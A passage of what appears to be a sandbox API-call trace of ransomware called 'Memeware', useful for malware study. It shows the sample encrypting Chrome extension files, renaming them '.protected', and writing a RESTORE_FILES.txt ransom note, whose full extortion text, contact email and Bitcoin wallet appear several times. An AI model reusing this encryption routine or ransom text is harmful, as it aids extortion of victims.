lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.759] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.759] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\..") returned 144 [0078.759] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.759] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.759] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.759] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.759] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.759] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.759] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.759] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.759] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned 155 [0078.759] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.759] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0078.760] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.760] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.760] CloseHandle (hObject=0x168) returned 1 [0078.761] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected") returned 165 [0078.761] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json.protected")) returned 1 [0078.761] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.761] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.761] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt") returned 159 [0078.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.762] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.762] lstrlenA (lpString="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") returned 684 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.762] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.762] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.762] CloseHandle (hObject=0x164) returned 1 [0078.762] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0078.763] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0078.763] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 141 [0078.763] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0078.763] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0078.763] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*") returned 143 [0078.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.763] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.763] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\.") returned 143 [0078.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.764] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\..") returned 144 [0078.764] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.764] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.764] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.764] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") 
returned 155 [0078.764] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.764] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned 155 [0078.764] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.765] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.765] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.765] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xdd, lpOverlapped=0x0) returned 1 [0078.765] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.765] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.766] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.766] CloseHandle (hObject=0x168) returned 1 [0078.766] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected") returned 165 [0078.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json.protected")) returned 1 [0078.766] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.766] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.766] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt") returned 159 [0078.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.767] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.767] lstrlenA (lpString="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") returned 684 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.767] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.767] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.767] CloseHandle (hObject=0x164) returned 1 [0078.767] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.767] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned -1 [0078.768] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0078.768] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0078.768] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned 141 [0078.768] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0078.768] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0078.768] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*") returned 143 [0078.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.768] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.768] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.768] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.768] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\.") returned 143 [0078.768] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.769] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.769] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.769] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.769] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\..") returned 144 [0078.769] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.769] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.769] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.769] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") 
returned 155 [0078.769] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.769] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.769] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.769] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.769] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json") returned 155 [0078.769] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.769] lstrlenW 